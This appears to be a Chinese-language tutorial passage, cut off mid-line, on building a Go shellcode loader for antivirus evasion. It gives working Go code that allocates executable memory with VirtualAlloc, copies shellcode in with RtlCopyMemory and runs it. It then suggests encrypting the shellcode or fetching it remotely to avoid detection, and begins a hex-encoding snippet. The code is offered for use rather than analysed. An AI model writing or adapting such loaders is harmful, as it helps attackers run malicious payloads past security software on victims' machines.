Go加载器
网上找的Go加载器,最简单的免杀就是将shellcode加密解密,或者远程加载shellcode。
package main
import (
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func main() {
xor_shellcode := []byte{0xfc, 0x48, 0x83, ...}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_shellcode[0])), uintptr(len(xor_shellcode)))
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
shellcode加密解密
简单的加密解密,可以把byte[]类型的shellcode->16进制字符串,Go代码如下。【网络安全学习攻略】
package main
import (
"bytes"
"encoding/hex"
"fmt"
)
func main() {
//将[]byte -> string(16进制)
shellcode := []byte{0xfc,0x48,0x83, ...}
s := hex.EncodeToString(shel